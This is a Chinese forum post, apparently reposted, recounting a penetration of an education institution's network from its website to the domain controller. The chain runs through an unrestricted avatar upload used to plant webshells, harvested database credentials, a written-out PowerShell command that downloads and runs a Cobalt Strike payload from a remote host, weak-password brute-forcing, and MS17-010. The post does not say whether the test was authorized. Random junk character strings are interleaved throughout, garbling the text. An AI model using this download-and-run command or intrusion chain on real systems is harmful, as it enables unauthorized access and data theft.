找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2120|回复: 0
打印 上一主题 下一主题

渗透实战 | 从外网直接打到内网全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2024-3-1 19:41:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

1 N5 N \, K& A+ |, C% e 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路 - u$ r8 F& g: w1 j# T6 [: B

1 J! U$ \& p; S" f# s4 H( _* M, E

6 P/ i, q% y& V# v4 P   ' M/ q, [4 N0 ^) z/ D

! Z. x' d6 J1 o' w2 S5 Q+ P# ~0 F# h

9 V, e. Y/ y9 `; S 正文 6 m$ M; P& G8 ^2 }+ c$ i7 o

+ Q$ P3 }! m$ J! T! U9 q3 p- d

7 h6 d2 j; @5 |. Z! d, `  0 i6 `% j! K1 c: N4 J M& |

2 e3 T- | t5 b+ G5 L

* x. L7 \ d% H$ { 目标:www.xxxx.com(一家教育机构)
( r6 M2 I) {; O9 \! d
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
- y6 [0 [7 R3 O! V* B: e, w

/ l$ X) J, J. I/ j

3 a @* R7 U: ?8 E+ w! s vshapes=0 |6 f' E, t k7 R4 l

/ E1 L3 U3 y- v& g- A

3 _6 g1 K. ?! L. \' J 进行了简单的信息搜集
- F$ I) `$ d; N+ N3 t/ o
1 Y6 D- R7 N& E- Z) ]( \* s0 L
' k: _+ Y0 K3 s/ s5 X; s9 l

5 r3 S' d7 e# E- m$ H9 E" I

9 p; M% N r& M- V' r6 Q 子域名搜集 9 U2 Y. C" _! Y7 U

" |6 y& W! e: g+ c; q# \2 z" b# x! C

. j$ K4 \5 z8 y- P7 K# i' y vshapes= " | X$ p8 M7 ~1 h/ s

* `. h& V( k. A" c1 q2 E( r$ `

% T- Z5 ^# B* v( z fofa找资产
4 V3 H3 L4 l) k
. N" _& u7 f9 F; t' {+ K
+ t! X$ }0 X. A4 Y/ r

. T* W) @& c4 g2 y# h0 W

p6 D- w4 t. t0 V8 ]) f vshapes=7 @$ g. B) G8 \! j3 f3 p) @& h

" V# E C+ W0 b9 z. N

2 k0 ^- q! d1 g/ R6 r/ D3 e 一共七个资产。去重之后只有两个。
9 X4 @- ~- m$ N
3 i4 U z5 O4 A M2 V
/ C( `7 F( {$ _% g8 R

" k% y0 q/ B0 [' _: }% B

+ L( X: b1 f0 [+ ]) ?) m9 }8 P 目录探测2 r3 i% a9 z# ]# A

$ g1 D* d# m3 w8 d0 A; X: [

) c! p% h6 {* Y- K4 ]& d: G1 A vshapes=& o6 ]6 l/ R7 Q0 z9 B9 S

1 U' G( g: o4 _8 F3 `7 o2 R! J5 Y

7 Y6 d$ P* |+ @" E 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
2 X, D# X$ l) V; n# W" V
- Y2 m4 T/ I j6 Y( D. {7 ^
7 W4 f/ r3 u7 D' w

' g4 _" }% n7 l* D3 y" g

! J6 ]9 L$ M+ p( G; V 我又尝试了通过修改返回包来绕过登录界面 ) n) q, m# B+ t; O/ p ~

; S$ R: X" S" e5 C: g

7 ^5 y6 o2 a6 t' C* J6 t& p vshapes=$ e% ~6 _. p0 P2 _" T

" t: Q1 Q; d; \9 v. z$ [2 s

! C8 r; [% E8 y( u# L( D& M 还是不行,尝试注入无果 " a& {0 U$ ^# }

: [/ B1 G4 H! k% K. N2 D

' O ?0 F4 e/ Q* {$ d% ^) P vshapes=0 C, |5 L( c* a

- K; K9 P) z! m0 U4 v0 R

+ S- Z$ z) r6 G. @) G6 H 不过我目录探测出了一处Spring信息泄露
8 {- d) s! y8 Y. g) I4 c
4 F) G8 y. J& P
. V7 a1 h& l6 z$ `. B9 p( U

3 N/ E( z( |5 O0 }3 B

* i7 v8 `& i+ p0 t vshapes= * E5 s) N8 `/ M1 Z2 a6 g7 v- V

; }* }9 J5 U$ W

1 i! P0 f6 A7 d& W 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录2 f% h, o. _; E3 y% b, Q1 R% M

. I# ]; e3 V- v3 r

- z- ?( l* X* |5 n vshapes=. ^3 l9 _% W7 \% [

, Z- g, Z# Y7 j

+ \' Y+ E% k/ f; y+ N. @) m) L 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。( A/ s! v+ y: c+ u0 \$ C! e5 k

' a7 a" `. a4 l Q a; }0 W5 V1 q p

0 V* ^% w7 |/ P vshapes=, X* U. s! H1 K+ Y& p) h! y( R( \

0 n7 ?4 C' H3 n5 w& r* C/ a; J/ j

6 u1 I, @2 T! ~! r" b 获取有些师傅到这一步就手机抓包电脑测了。 9 G( M" R8 e" z* [) X

. ~; A- z6 R. @

; B0 z0 c. m( H9 P, s Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。 2 t/ _# ~5 z8 x* {1 g1 |7 E- ]0 O+ n

" @& m- _ ^5 w" \1 s1 p

7 r l9 I! a6 s( k, `9 O/ e% d! K9 ?7 `' ~ 其中在一个公众号发现了小程序,可以进行注册。1 \9 w5 B3 J/ [, |1 r1 S' m

+ ` O9 w3 r1 t

3 C2 F, {$ y4 u f7 C 看到了头像上传,尝试上传获取WebShell 0 L7 e; ^& K+ v, S* K; O

4 ]' k; s- l3 M: J

* o5 P2 D" c; ^ vshapes= 4 q+ E- A4 ^ K7 K- B

8 _: S0 R0 b/ f! {% } ?' o. v

' C. Y2 z- ]$ ~. Q& u0 ~/ t 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问 4 u+ |' N( u) V4 C$ d; }/ _

( I" z$ G6 w- \( p

4 y* X1 D4 w* {/ F3 G- U vshapes= ; Z3 w7 R5 ~4 N- g* [' c o

8 X. }. B% p8 J3 D s& [

T* y: p& c. u2 Y 然后上了大马$ Z l' h X2 l0 W9 S% i

. t9 g: g" G% j' n# {8 _- x7 b) A4 }

- A+ ^3 L, v! G/ D. i. z vshapes=- l, Y( r' P/ G

+ `1 V; J3 ~! {. I6 J9 w$ Z

; z- w0 V7 M$ I7 ^' B7 W4 e% V5 G vshapes= - M! J$ k6 ` ]0 T

8 e; Z5 o) Y( X8 ]

" N1 ~; K) @. b/ F1 c/ j" m 通过翻找文件发现数据库账号密码4 C- d8 Y- j; E1 a

7 z& b u9 h, n/ k% U C: ~

1 J7 k1 M8 C# {* A$ } f% a vshapes=: h% S7 A7 C2 f! a6 O7 p

5 z# _) U5 Y7 Y7 [' {8 G

6 C! M' @. T n5 F --内网渗透' }$ M: Z5 } T/ r

* f/ L% a9 Z2 F

F$ V! g" V H% t6 O" u6 h R" B t 直接通过powershell执行 cs上线 3 U: N* _; d' E6 k4 }- K4 t

$ k- l( C3 ?3 V. ~8 W6 c" M# h8 R

' O0 z: y B- h u) j% C m% d powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))" * t. k' A9 N3 m+ m$ L: c( B

$ V. r& f5 a1 _3 ?+ z( x8 I# H8 X3 k

; e/ }/ I8 v* E vshapes= 9 n4 g% t0 z6 n' @" ~0 P

) R y3 F5 E. P7 S3 H# l/ J

6 F4 J3 _+ ] w; `8 i" V* \ 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破 + w" l( M0 ^$ y5 J

# S' o. j: H# T8 P( l3 Q

o7 S7 H3 H/ S7 }0 z# |& b vshapes= 1 [6 N# I0 f2 f4 j' r

5 ^, A/ K. X$ J3 D

& [/ v( r; d- Q 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
& a l2 W/ }4 g3 I! y4 J- n0 ^6 l
( b, m4 x S9 F+ c T) f; @3 r* B% x( V
1 a n6 K# r1 V: _- _
) {; z; D: Y1 u6 ?- y! A! V9 F

6 t/ N" ?* ~% J- h% c

- d6 {- B# g9 {( \" Q- _ vshapes= + W' A1 E i1 b* N5 L

, w/ J8 w, Z0 w' G0 Z; ]

* j# D3 |" H, p/ B% D 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
. N8 W+ d( t% g" k3 g9 V
% @. Y- i+ h: z7 b( a
) y. e" {( k$ ?3 \) q

5 z2 ]0 |5 c% z% W) T" F

0 `, u! ?: Y# P; J: D vshapes=- _+ R5 g% j( f5 R/ y) N \3 w& m

% a( p6 n; P$ s/ l4 v: e

) [8 ^$ A6 c7 K) u# [
3 P8 M0 c0 e/ ?$ M9 g; N
# O, \. U: e: }2 |& X" L3 K
6 Z Y7 N y2 O9 n. L" P

+ A7 S* m4 x7 y0 b/ X

2 t% {' p7 K- D. }( q- @   , }4 i# h; f) q, m

R3 U0 r9 J8 L, C, K% h% p" W

% h3 \9 ], B A# o, ? 小结0 H& m! m$ ]0 c* [& m) @8 J. A. o

2 S0 m; O) F7 i7 f6 y& v

/ F% }2 Q; s6 O   - k1 G. l4 ]0 d- Q3 U7 u6 ^

6 S6 c7 b4 }! r) q* R

$ I1 ^4 v* i, h `, Y 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路! 9 R `$ U D' K% B; B2 Z6 q3 l

2 q) F k7 c8 u4 k2 T

1 d2 N5 n" b/ j3 H) u* S9 X* k3 p  6 |2 M' Y- \% n; z# a ^0 w- G

1 ~3 C6 I7 v& M0 I
    $ n: \# Y0 _5 K$ R
  • - T8 Y9 |& h2 ~% S/ J+ }1 ]* u: U  ! O: ]3 I% o I5 b5 L; ? X6 ?/ a
  • & }% }; P3 _* D& h& [! _2 J( t
  • 9 T& B3 E; x, I5 H$ D* ]2 O   $ I! `& s% f( Q9 d* H& I
  • : _$ @+ k7 |" Y0 X7 J& \9 B
2 `8 G1 p4 }; A" V7 R ?' Z

6 V& [5 Y; a. I* {1 Y" \9 O 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html/ j+ {( h7 K" R, J3 H2 D

, P& G9 j# U' Q5 q

; M# a p# ^5 q$ I) _# b  & ]% A6 {8 Z( a- x) I

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表